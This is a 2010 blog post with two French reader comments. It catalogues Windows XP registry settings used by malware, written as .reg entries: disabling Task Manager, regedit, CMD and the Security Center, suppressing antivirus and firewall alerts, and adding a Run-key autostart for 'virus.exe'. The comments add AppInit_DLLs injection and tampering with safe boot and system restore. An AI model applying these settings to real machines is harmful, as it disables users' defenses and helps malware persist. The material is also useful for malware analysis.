Monday 20 September 2010

WinXP Registry keys who can interest bad guys


;.: WinXP Registry keys who can interest bad guys :.
;               Xylitol ~ Horadrim (ssteam)
;Found with http://technet.microsoft.com/en-us/library/cc778196%28WS.10%29.aspx


;Disable regedit:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000001

;Disable CMD:
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System]
"DisableCMD"=dword:00000001

;Disable TaskManager:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:00000001

;Disable AV notification (Security Center settings):
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"AntiVirusDisableNotify"=dword:00000001

;Disable Firewall notification (Security Center settings):
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"FirewallDisableNotify"=dword:00000001

;Disable Update notification (Security Center settings):
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"UpdatesDisableNotify"=dword:00000000

;Ignore AV (Security Center settings):
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"AntivirusOverride"=dword:00000000

;Ignore Firewall (Security Center settings):
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"FirewallOverride"=dword:00000000

;This is sometimes important, cause some malware creates a small,
;local proxy to insert iframes, redirect you to some different pages etc:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"="8080"
"ProxyEnable"=dword:00000001
"ProxyOverride"=">local>"

;Hide All System Tray Icons:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoTrayItemsDisplay"=dword:00000001

;Disabling Balloon Tips:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"EnableBalloonTips"=dword:00000000

;Add a text on the systemtray clock:
[HKEY_CURRENT_USER\Control Panel\International]
"s1159"=" VIRUS!"
"s2359"=" VIRUS!"
"sTimeFormat"="HH:mm:ss.tt"

;IE settings:
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Window Title"="Microsoft Internet Explorer"
"Start Page"="about:blank"
"Disable Script Debugger"="yes"
"NotifyDownloadComplete"="yes"

;Autorun:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"virus"=""C:\virus.exe"

;Disable the security center:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wscsvc]
"Start"=dword:00000004

;wallpaper:
[HKEY_CURRENT_USER\Control Panel\Desktop]
"Wallpaper"="C:\\virus.bmp"

;Disable error sound:
[HKEY_CURRENT_USER\Control Panel\Sound]
"Beep"="no"
"ExtendedSounds"="no"

;Disable the error reporting service:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ERSvc]
"Start"=dword:00000004

;Hide the computer from the fav network:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]
"Hidden"=dword:00000001
Liste non exhaustive.

2 comments:

  1. Je rajouterais même: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs qui permet de modifier sur les OS jusqu'à xp inclu les DLLs chargées au démarrage par USER32.dll => cool pour une injection de DLL. D'ailleurs bientôt un article sur mon blog sur tous les types d'injections de DLLs et hooks r3.

    ReplyDelete
  2. Je rajoute aussi SafeBoot pour ne pas permettre le démarage en mode sans echec et SystemRestore pour ne pas remonter à un point de réstauration clean.

    ReplyDelete